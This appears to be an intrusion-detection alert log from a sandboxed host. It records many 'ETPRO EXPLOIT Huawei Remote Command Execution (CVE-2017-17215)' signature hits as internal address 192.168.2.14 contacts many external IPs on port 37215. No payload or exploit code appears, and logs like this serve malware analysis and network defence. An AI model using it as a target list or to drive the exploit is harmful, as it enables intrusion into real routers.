                                                        06/13/24-21:32:03.278770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413037215192.168.2.14197.205.249.150
                                                        06/13/24-21:32:32.156121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424837215192.168.2.14197.74.196.247
                                                        06/13/24-21:32:05.371308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793837215192.168.2.14156.75.131.59
                                                        06/13/24-21:32:36.266390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664837215192.168.2.1441.202.114.157
                                                        06/13/24-21:33:07.038329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408037215192.168.2.1441.123.115.249
                                                        06/13/24-21:32:17.695610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936837215192.168.2.14156.156.151.152
                                                        06/13/24-21:33:04.987665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.14156.218.38.255
                                                        06/13/24-21:32:36.242408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152237215192.168.2.14156.141.125.193
                                                        06/13/24-21:32:30.098720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692437215192.168.2.14197.53.2.250
                                                        06/13/24-21:32:46.503335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660637215192.168.2.14156.75.72.90
                                                        06/13/24-21:32:11.509522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412837215192.168.2.14197.215.115.48
                                                        06/13/24-21:32:40.354787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330837215192.168.2.14197.119.70.241
                                                        06/13/24-21:32:42.404439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743237215192.168.2.14156.57.232.171
                                                        06/13/24-21:32:15.634279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925037215192.168.2.1441.251.219.62
                                                        06/13/24-21:32:23.943321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000037215192.168.2.14156.118.190.208
                                                        06/13/24-21:32:21.804251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453637215192.168.2.1441.241.60.146
                                                        06/13/24-21:32:44.475279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181237215192.168.2.14197.185.126.21
                                                        06/13/24-21:32:13.564959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396837215192.168.2.1441.127.205.195
                                                        06/13/24-21:32:46.503501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269837215192.168.2.1441.98.255.159
                                                        06/13/24-21:32:09.456057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233837215192.168.2.14156.97.33.180
                                                        06/13/24-21:32:15.610220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314237215192.168.2.1441.251.4.91
                                                        06/13/24-21:32:11.485370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211237215192.168.2.1441.204.64.240
                                                        06/13/24-21:32:19.727618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558237215192.168.2.14197.117.85.164
                                                        06/13/24-21:32:58.838192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589637215192.168.2.14197.77.119.15
                                                        06/13/24-21:32:09.458228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.14197.162.30.78
                                                        06/13/24-21:32:15.608253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850237215192.168.2.1441.142.142.204
                                                        06/13/24-21:31:57.091075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887037215192.168.2.14156.16.175.101
                                                        06/13/24-21:32:11.506208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959437215192.168.2.1441.85.23.229
                                                        06/13/24-21:32:32.166122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040437215192.168.2.1441.160.159.137
                                                        06/13/24-21:32:54.724869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066837215192.168.2.14156.155.91.27
                                                        06/13/24-21:32:09.453993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810237215192.168.2.14156.1.30.19
                                                        06/13/24-21:32:19.726873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565837215192.168.2.14197.178.183.168
                                                        06/13/24-21:32:21.783565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171637215192.168.2.14197.239.232.11
                                                        06/13/24-21:32:32.153162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177837215192.168.2.14156.237.148.1
                                                        06/13/24-21:32:58.822822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297237215192.168.2.14197.7.166.192
                                                        06/13/24-21:32:58.824074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066837215192.168.2.14156.194.151.71
                                                        06/13/24-21:32:58.841675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860837215192.168.2.14156.220.169.49
                                                        06/13/24-21:33:09.086787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137637215192.168.2.1441.35.10.99
                                                        06/13/24-21:32:52.680897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373237215192.168.2.1441.63.176.35
                                                        06/13/24-21:32:05.347439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517037215192.168.2.14197.253.39.140
                                                        06/13/24-21:32:38.303886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863037215192.168.2.1441.58.163.80
                                                        06/13/24-21:32:52.659525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486437215192.168.2.14197.251.83.132
                                                        06/13/24-21:32:23.941278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018037215192.168.2.14156.225.215.92
                                                        06/13/24-21:32:28.025981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355837215192.168.2.14197.151.147.106
                                                        06/13/24-21:33:17.307221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351037215192.168.2.1441.145.143.100
                                                        06/13/24-21:32:21.804665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348437215192.168.2.1441.123.161.80
                                                        06/13/24-21:32:38.323137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757237215192.168.2.14156.22.64.32
                                                        06/13/24-21:33:17.310010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410437215192.168.2.14156.92.155.233
                                                        06/13/24-21:32:25.995055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108437215192.168.2.14156.22.131.210
                                                        06/13/24-21:32:44.480229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551037215192.168.2.14197.182.45.254
                                                        06/13/24-21:32:34.200085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575237215192.168.2.14156.201.129.45
                                                        06/13/24-21:32:09.456208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781437215192.168.2.1441.108.253.155
                                                        06/13/24-21:32:46.507933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585837215192.168.2.14197.138.26.98
                                                        06/13/24-21:32:01.248571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857437215192.168.2.14156.36.253.113
                                                        06/13/24-21:32:36.245621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620437215192.168.2.14156.205.228.28
                                                        06/13/24-21:32:40.377610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177837215192.168.2.14156.197.125.41
                                                        06/13/24-21:33:09.108564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306237215192.168.2.1441.252.228.188
                                                        06/13/24-21:32:42.407205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800437215192.168.2.1441.116.228.124
                                                        06/13/24-21:32:13.546429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549037215192.168.2.14197.174.206.135
                                                        06/13/24-21:32:07.417634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430637215192.168.2.1441.255.24.243
                                                        06/13/24-21:32:15.608567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490237215192.168.2.14197.241.97.91
                                                        06/13/24-21:32:03.278200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015437215192.168.2.14197.98.113.18
                                                        06/13/24-21:32:11.486783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654037215192.168.2.14197.49.93.203
                                                        06/13/24-21:32:07.402321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140637215192.168.2.14156.19.193.150
                                                        06/13/24-21:32:38.297936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878037215192.168.2.14156.253.23.45
                                                        06/13/24-21:32:09.456688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723837215192.168.2.14156.102.147.188
                                                        06/13/24-21:32:19.728669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173037215192.168.2.1441.144.153.144
                                                        06/13/24-21:32:32.153118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376037215192.168.2.1441.129.232.239
                                                        06/13/24-21:32:46.508079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380037215192.168.2.14156.11.221.237
                                                        06/13/24-21:32:42.408784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431437215192.168.2.14197.73.238.158
                                                        06/13/24-21:33:00.884814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105837215192.168.2.14197.244.138.32
                                                        06/13/24-21:32:09.438622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159037215192.168.2.14197.154.217.110
                                                        06/13/24-21:33:00.884607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599237215192.168.2.14197.205.172.125
                                                        06/13/24-21:32:58.843800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382037215192.168.2.14197.53.210.25
                                                        06/13/24-21:32:34.216807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166037215192.168.2.14156.30.175.231
                                                        06/13/24-21:33:15.259225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.14197.218.115.103
                                                        06/13/24-21:31:59.176205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486237215192.168.2.14156.75.209.109
                                                        06/13/24-21:32:01.238651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398037215192.168.2.14197.111.51.84
                                                        06/13/24-21:33:09.090113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528837215192.168.2.1441.204.145.138
                                                        06/13/24-21:32:13.569268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439437215192.168.2.14197.80.141.138
                                                        06/13/24-21:32:44.451355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790237215192.168.2.1441.69.231.99
                                                        06/13/24-21:32:15.633759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790837215192.168.2.14156.108.52.128
                                                        06/13/24-21:33:11.176516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101237215192.168.2.14197.159.228.160
                                                        06/13/24-21:33:04.994290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565437215192.168.2.14156.158.78.118
                                                        06/13/24-21:32:50.617805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047437215192.168.2.1441.57.215.63
                                                        06/13/24-21:32:23.832679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901437215192.168.2.14197.235.42.211
                                                        06/13/24-21:33:04.992736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811037215192.168.2.14197.59.159.11
                                                        06/13/24-21:32:17.697324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121637215192.168.2.1441.93.115.224
                                                        06/13/24-21:32:21.786904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729237215192.168.2.14197.122.61.68
                                                        06/13/24-21:32:09.457445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341437215192.168.2.14156.183.172.186
                                                        06/13/24-21:33:09.127335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818437215192.168.2.14156.95.19.26
                                                        06/13/24-21:32:05.378026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436037215192.168.2.1441.225.232.171
                                                        06/13/24-21:33:07.055478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572437215192.168.2.1441.198.111.6
                                                        06/13/24-21:32:28.043477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777437215192.168.2.1441.2.75.246
                                                        06/13/24-21:32:48.570978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881837215192.168.2.14197.167.91.128
                                                        06/13/24-21:33:07.040366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.14156.188.212.148
                                                        06/13/24-21:32:42.424840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394437215192.168.2.14156.184.107.191
                                                        06/13/24-21:33:11.160507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414237215192.168.2.14156.28.228.216
                                                        06/13/24-21:32:07.416848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296437215192.168.2.14156.169.150.109
                                                        06/13/24-21:33:15.259315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118237215192.168.2.14156.12.77.5
                                                        06/13/24-21:32:11.486083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422037215192.168.2.1441.242.249.185
                                                        06/13/24-21:31:59.195836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354637215192.168.2.1441.55.174.73
                                                        06/13/24-21:32:13.545828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926037215192.168.2.14197.198.151.197
                                                        06/13/24-21:32:58.819964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030237215192.168.2.14156.248.131.0
                                                        06/13/24-21:32:09.459090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983037215192.168.2.1441.236.60.154
                                                        06/13/24-21:33:02.952479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570037215192.168.2.1441.109.62.122
                                                        06/13/24-21:32:42.406587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296837215192.168.2.14156.219.70.114
                                                        06/13/24-21:32:38.303359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266437215192.168.2.14156.74.114.172
                                                        06/13/24-21:33:09.087329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473237215192.168.2.1441.120.214.18
                                                        06/13/24-21:32:34.197667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191037215192.168.2.14156.86.160.137
                                                        06/13/24-21:32:30.098547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135837215192.168.2.14156.217.71.38
                                                        06/13/24-21:33:11.154212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962637215192.168.2.14156.6.4.79
                                                        06/13/24-21:32:36.266286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470237215192.168.2.14197.209.124.220
                                                        06/13/24-21:33:09.108194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829837215192.168.2.1441.45.94.203
                                                        06/13/24-21:32:34.212434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158037215192.168.2.14197.15.208.244
                                                        06/13/24-21:33:13.228245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5011037215192.168.2.14197.38.139.79
                                                        06/13/24-21:32:50.612059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706637215192.168.2.14156.105.210.236
                                                        06/13/24-21:32:19.753766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861237215192.168.2.14156.0.253.212
                                                        06/13/24-21:32:36.247687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181237215192.168.2.14197.225.123.128
                                                        06/13/24-21:32:21.803267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937437215192.168.2.14197.190.255.96
                                                        06/13/24-21:32:01.237747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677837215192.168.2.1441.179.113.114
                                                        06/13/24-21:31:57.093613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498837215192.168.2.1441.218.92.40
                                                        06/13/24-21:32:09.456364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076837215192.168.2.14156.4.247.183
                                                        06/13/24-21:32:25.974255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614637215192.168.2.1441.65.205.1
                                                        06/13/24-21:32:46.503588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582837215192.168.2.14156.180.158.122
                                                        06/13/24-21:32:48.553246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367237215192.168.2.14197.52.132.232
                                                        06/13/24-21:31:57.152772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639437215192.168.2.14197.163.91.156
                                                        06/13/24-21:32:19.728124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420437215192.168.2.14197.187.44.188
                                                        06/13/24-21:32:48.554586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4612237215192.168.2.14156.137.108.45
                                                        06/13/24-21:32:42.421733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480637215192.168.2.1441.113.222.99
                                                        06/13/24-21:32:25.972994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497237215192.168.2.14197.24.170.121
                                                        06/13/24-21:32:56.756872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080837215192.168.2.14156.89.246.103
                                                        06/13/24-21:32:30.127909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533437215192.168.2.14197.110.228.145
                                                        06/13/24-21:32:38.302501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793037215192.168.2.14156.187.137.2
                                                        06/13/24-21:32:03.307743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405637215192.168.2.14197.11.243.135
                                                        06/13/24-21:32:05.348947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843037215192.168.2.14156.236.220.120
                                                        06/13/24-21:32:40.357310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425637215192.168.2.1441.239.50.209
                                                        06/13/24-21:32:56.788332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.14197.100.66.79
                                                        06/13/24-21:32:25.992633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373437215192.168.2.14156.219.161.229
                                                        06/13/24-21:32:28.046037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755237215192.168.2.1441.211.8.102
                                                        06/13/24-21:32:09.457722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993437215192.168.2.1441.81.255.144
                                                        06/13/24-21:32:40.374551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344637215192.168.2.14156.13.190.60
                                                        06/13/24-21:32:03.273664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322237215192.168.2.14197.91.248.132
                                                        06/13/24-21:31:57.093545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292637215192.168.2.1441.226.92.240
                                                        06/13/24-21:32:25.978594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142037215192.168.2.14156.226.215.53
                                                        06/13/24-21:31:57.090759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030037215192.168.2.14156.226.12.30
                                                        06/13/24-21:32:54.711284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492037215192.168.2.14197.211.226.11
                                                        06/13/24-21:32:40.357114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248837215192.168.2.1441.54.159.133
                                                        06/13/24-21:32:38.322177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968037215192.168.2.14197.130.88.88
                                                        06/13/24-21:32:19.729706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330037215192.168.2.1441.0.63.98
                                                        06/13/24-21:32:42.425001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833437215192.168.2.1441.14.158.74
                                                        06/13/24-21:32:54.711221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556637215192.168.2.14197.228.130.174
                                                        06/13/24-21:33:00.868839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195237215192.168.2.1441.126.104.39
                                                        06/13/24-21:31:57.093854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14156.161.214.109
                                                        06/13/24-21:33:00.889112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263037215192.168.2.14197.13.113.243
                                                        06/13/24-21:31:59.195005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673237215192.168.2.14156.156.109.129
                                                        06/13/24-21:32:56.758539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920837215192.168.2.1441.86.72.62
                                                        06/13/24-21:32:15.634536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716837215192.168.2.1441.123.78.171
                                                        06/13/24-21:32:32.155663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.14197.44.41.63
                                                        06/13/24-21:32:13.546872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811037215192.168.2.1441.119.168.53
                                                        06/13/24-21:32:01.241772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069837215192.168.2.14197.117.99.162
                                                        06/13/24-21:32:13.566141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413837215192.168.2.14197.8.233.234
                                                        06/13/24-21:33:15.276928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464237215192.168.2.14156.124.253.220
                                                        06/13/24-21:32:21.801857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897837215192.168.2.14156.135.148.165
                                                        06/13/24-21:32:05.345935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749637215192.168.2.14197.235.142.34
                                                        06/13/24-21:33:09.110354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705837215192.168.2.1441.171.237.18
                                                        06/13/24-21:32:21.782986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459437215192.168.2.14197.31.121.111
                                                        06/13/24-21:32:32.151418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837437215192.168.2.1441.69.175.189
                                                        06/13/24-21:32:25.977646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249037215192.168.2.1441.14.102.93
                                                        06/13/24-21:32:30.079890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562237215192.168.2.1441.161.152.236
                                                        06/13/24-21:32:34.216491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828637215192.168.2.14156.67.46.62
                                                        06/13/24-21:32:44.454384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964037215192.168.2.14197.73.27.182
                                                        06/13/24-21:32:30.075579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14156.93.243.220
                                                        06/13/24-21:32:32.165497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965237215192.168.2.14197.0.78.10
                                                        06/13/24-21:32:36.246967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14156.20.139.31
                                                        06/13/24-21:32:32.168733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464637215192.168.2.14156.228.231.108
                                                        06/13/24-21:33:04.992074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865437215192.168.2.14156.65.60.65
                                                        06/13/24-21:33:07.060506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157037215192.168.2.14156.244.150.109
                                                        06/13/24-21:32:17.670417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520437215192.168.2.1441.162.128.234
                                                        06/13/24-21:33:11.160621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847237215192.168.2.14197.135.96.220
                                                        06/13/24-21:32:42.422507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580637215192.168.2.14156.28.55.118
                                                        06/13/24-21:33:15.258272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4390037215192.168.2.14197.210.197.32
                                                        06/13/24-21:32:25.994658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397237215192.168.2.14156.25.55.92
                                                        06/13/24-21:32:30.094028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067037215192.168.2.14156.8.110.29
                                                        06/13/24-21:32:23.945409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886637215192.168.2.1441.80.154.169
                                                        06/13/24-21:32:44.450511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829237215192.168.2.14156.112.233.103
